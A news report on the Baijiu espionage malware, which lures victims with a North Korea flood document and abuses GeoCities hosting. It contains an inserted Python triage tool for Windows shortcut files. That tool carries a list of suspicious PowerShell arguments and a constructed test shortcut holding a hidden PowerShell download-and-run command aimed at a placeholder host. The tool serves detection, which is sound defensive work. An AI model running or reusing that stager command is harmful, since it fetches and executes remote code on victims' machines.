Security researchers have detected a new strain of malware, dubbed Baijiu, that targets people curious about what happens inside North Korea. According to security firm Cylance, the threat "abuses global concern about the dire humanitarian situation in North Korea" by luring victims with a malicious file that promises insight into the devastating flood that hit North Hamgyong province last year.
The phishing bait reads: "2016 North Korea Hamgyung province flood insight."
"The lure is a reference to a natural disaster that took place in late August 2016, when Typhoon Lionrock triggered massive flooding that wiped out much of North Korea's province of North Hamgyong, impacting more than half a million people, drawing world-wide notice, and commanding international news coverage for several months," researchers said.
Despite the media attention, details regarding the extent, casualties and aftermath of the disastrous flood are still scarce.
"Reports surfaced of attempts at escape and defection to neighbouring China, after border forces and fencing were washed away," researchers explain. "Drawing even more curiosity were statements from Pyongyang itself, which took the rare step of publicly declaring the flood the worst natural disaster since 1945.
"How the crisis was resolved, and what its lasting impact was on North Korea is anyone's guess. Exactly how many people died or were displaced? Were North Korea's official pronouncements to be believed? Baijiu's attackers bet that many of their phishing targets would click on their attachment to find out just that – in other words, they would take the bait."
The attack aims to deploy a set of espionage tools through a downloader called Typhoon and a set of backdoors dubbed Lionrock.
Cylance assesses that the threat is most likely of Chinese origin. Its code overlaps with the Egobot codebase, and through that overlap it is linked to the Darkhotel operation.
"Baijiu's circuitous route from LNK file to Lionrock backdoor through multiple DLL files and PowerShell scripts – and its ability to obfuscate itself through each stage while doing so – makes this attack stand out", researchers said. "Baijiu attackers likely employed this strategy to throw researchers and investigators off their track, and ensure only the targeted victims received the payloads."
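The chain described above begins with a Windows shortcut (.lnk) file, so a practical triage step is to pull the target, command-line arguments and window state out of the shortcut's binary header and string data without opening it. The following Python is an added example, not code from Cylance or from the Baijiu sample: it implements a minimal MS-SHLLINK parser, flags shortcuts that point at PowerShell or a similar script host with hidden-window or download-and-run arguments, and builds two constructed shortcuts (one benign, one hypothetical malicious) to exercise the check. The paths, URL and argument string in the malicious sample are made up for illustration and are not indicators from any real case.

```python
"""Added example: triage .lnk files for PowerShell-style launch chains.
Minimal MS-SHLLINK parser plus heuristics; samples below are constructed."""
import struct
import uuid

LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")

# LinkFlags bits from MS-SHLLINK section 2.1.1
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 1 << 0, 1 << 1, 1 << 2
HAS_RELATIVE_PATH, HAS_WORKING_DIR = 1 << 3, 1 << 4
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 1 << 5, 1 << 6, 1 << 7

SW_SHOWNORMAL = 1
SW_SHOWMINNOACTIVE = 7  # opens minimized without focus: the user never sees a console

# StringData sections appear in this fixed order when their flag is set.
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))

# Script hosts and LOLBins a document-looking shortcut should never point at.
LAUNCHERS = ("powershell", "pwsh", "cmd.exe", "rundll32", "regsvr32",
             "mshta", "wscript", "cscript")
# Case-insensitive substrings typical of hidden download-and-run stagers.
SUSPICIOUS_ARGS = ("-enc", "-nop", "-w hidden", "-windowstyle hidden",
                   "executionpolicy bypass", "iex", "invoke-expression",
                   "downloadstring", "downloadfile", "frombase64string")


def parse_lnk(data: bytes) -> dict:
    """Return LinkFlags, ShowCommand and the StringData fields of a shortcut."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("bad HeaderSize: not a shell link")
    if uuid.UUID(bytes_le=data[4:20]) != LNK_CLSID:
        raise ValueError("bad LinkCLSID: not a shell link")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_command = struct.unpack_from("<I", data, 60)[0]
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:  # IDListSize excludes its own 2 bytes
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:            # LinkInfoSize includes its own 4 bytes
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    info = {"flags": flags, "show_command": show_command}
    for flag, name in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]  # characters, not bytes
        pos += 2
        nbytes = count * 2 if unicode else count
        raw = data[pos:pos + nbytes]
        info[name] = raw.decode("utf-16-le" if unicode else "cp1252", errors="replace")
        pos += nbytes
    return info


def assess_lnk(data: bytes) -> list:
    """Return human-readable findings; an empty list means nothing looked off."""
    info = parse_lnk(data)
    target = (info.get("relative_path") or info.get("name") or "").lower()
    args = (info.get("arguments") or "").lower()
    icon = (info.get("icon_location") or "").lower()
    findings = []
    launches_host = any(l in target for l in LAUNCHERS)
    if launches_host:
        findings.append(f"target is a script host/LOLBin: {target}")
    hits = [k for k in SUSPICIOUS_ARGS if k in args]
    if hits:
        findings.append("suspicious arguments: " + ", ".join(hits))
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("ShowCommand=SW_SHOWMINNOACTIVE (console hidden from the user)")
    if launches_host and icon and not any(l in icon for l in LAUNCHERS):
        findings.append(f"icon borrowed from a different file: {icon}")
    return findings


def build_lnk(relative_path, arguments=None, show_command=SW_SHOWNORMAL,
              working_dir=None, icon_location=None) -> bytes:
    """Build a minimal Unicode shortcut (no IDList/LinkInfo) for testing."""
    values = {"relative_path": relative_path, "working_dir": working_dir,
              "arguments": arguments, "icon_location": icon_location}
    flags = IS_UNICODE
    for flag, name in STRING_FIELDS:
        if values.get(name) is not None:
            flags |= flag
    header = struct.pack("<I", 0x4C) + LNK_CLSID.bytes_le + struct.pack(
        "<IIQQQIIIHHII", flags, 0, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    body = b"".join(struct.pack("<H", len(values[name])) + values[name].encode("utf-16-le")
                    for _, name in STRING_FIELDS if values.get(name) is not None)
    return header + body + b"\x00\x00\x00\x00"  # empty ExtraData + TerminalBlock


# Constructed samples (hypothetical paths/URL; not indicators from any real case).
BENIGN_LNK = build_lnk("..\\flood_report.txt")
MALICIOUS_LNK = build_lnk(
    "..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    arguments="-nop -w hidden -ExecutionPolicy Bypass -c \"IEX (New-Object "
              "Net.WebClient).DownloadString('http://stage2.example.invalid/a')\"",
    show_command=SW_SHOWMINNOACTIVE,
    icon_location="%SystemRoot%\\System32\\shell32.dll",
)

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_LNK), ("malicious", MALICIOUS_LNK)):
        print(label, assess_lnk(blob) or ["no findings"])
```

The heuristics are deliberately coarse (substring matches, a fixed launcher list) and meant for sorting a mailbox full of attachments, not for a verdict; a real shortcut carrying an IDList or LinkInfo block is skipped over correctly, but targets expressed only inside the IDList would need a PIDL parser to recover.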
The researchers said the attack's unusual complexity, its appropriation of the Japanese web hosting service GeoCities and its use of multiple methods of obfuscation have helped the malware evade nearly every antivirus product.
Yahoo-owned GeoCities is a free web hosting service in Japan that anyone with a Yahoo email address can use. Because it requires no information beyond that address, it is an easy platform for malicious actors to abuse.
The researchers said they observed 10 other active sites hosted on GeoCities that were used to deploy similar malicious payloads.
"Appropriating the GeoCities' free, high-bandwidth, civilian infrastructure helps Baijiu hide in plain sight, and signals a troubling new trend in attack techniques that is almost surely not restricted to Yahoo's GeoCities," they wrote.